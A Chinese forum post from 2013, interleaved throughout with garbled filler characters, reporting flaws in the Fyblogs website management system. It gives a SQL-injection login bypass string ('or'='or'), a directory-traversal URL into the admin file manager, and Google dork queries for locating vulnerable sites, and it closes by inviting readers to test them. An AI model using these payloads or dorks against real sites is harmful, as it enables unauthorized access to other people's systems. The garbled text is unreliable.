漏洞类型: 未授权访问/权限绕过
* F5 h+ d2 u; _. r9 W3 m, K. }: A, q' i# F3 |: g+ g% z
简要描述:
" m* t- T! f2 [5 ] D" S4 Q7 [; ~
b+ Y4 Z8 d- M1 M) J9 ~Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露! b) H( X! l3 t! N
! G- L, g4 z+ Z5 ]3 I8 q9 ~
详细说明:
' o8 ~# u+ s2 O0 N8 K2 V& I
( X2 |7 e) _8 d, r! ]' h3 @后台万能密码 'or'='or'3 b. M0 G3 }- [- h, S
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
x% r( e; Q2 T4 C% R% Xadmin/uploadfile.asp?currentFolder=/upfiles/../
0 j$ x8 `% x# m' _1 I" l% t n
& T [4 k6 ~' l/ b3 a. o漏洞证明:7 o8 [4 p. D8 h3 ]6 a
# ?: z4 f, P( y: z1 c7 ~谷歌:inurl:type.asp?id=1 新闻中心; K2 {+ d3 G' Z5 v
或者 :inurl:download_ok.asp?& `+ ~% b- y) |, g3 i7 r
$ A! N( e% ?2 j4 i7 L
可以测试. K! g) B4 J2 y
& r/ V# ]& u# m: f4 x- P
1 Z( z) f: b6 Z( a4 r* f |
发表于 2013-3-7 13:07:46
收藏
支持
反对